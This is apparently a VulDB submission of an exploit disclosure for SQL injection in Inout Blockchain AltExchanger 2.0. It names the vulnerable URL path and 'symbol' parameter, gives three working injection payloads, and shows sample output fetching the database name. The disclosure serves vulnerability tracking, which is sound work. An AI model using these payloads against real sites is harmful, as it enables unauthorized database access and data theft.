Submit #177561: Inout Blockchain AltExchanger 2.0 - SQL Injection
Information

Title: Inout Blockchain AltExchanger 2.0 - SQL Injection

Description:

# Exploit Title: Inout Blockchain AltExchanger 2.0 - SQL Injection
# Date: 04/07/2023
# Exploit Author: CraCkEr
# Vendor: Inout Scripts
# Vendor Homepage: https://www.inoutscripts.com/
# Software Link: https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /application/third_party/Chart/TradingView/chart_content/master.php/history

https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203

GET parameter 'symbol' is vulnerable to SQL Injection

---
Parameter: symbol (GET)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: symbol=ZRX-BTC') AND 06585=6585

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203
---

[+] Starting the Attack

fetching current database
current database: '*****_blockchain_altexchanger_***'

[-] Done
User: skalvin (UID 49463)
Submission: 04.07.2023 18:01 (3 years ago)
Moderation: 11.07.2023 17:23 (7 days later)
Status: Duplicate
VulDB entry: 200588 [Inout Blockchain AltExchanger master.php symbol SQL injection]
Points: 0
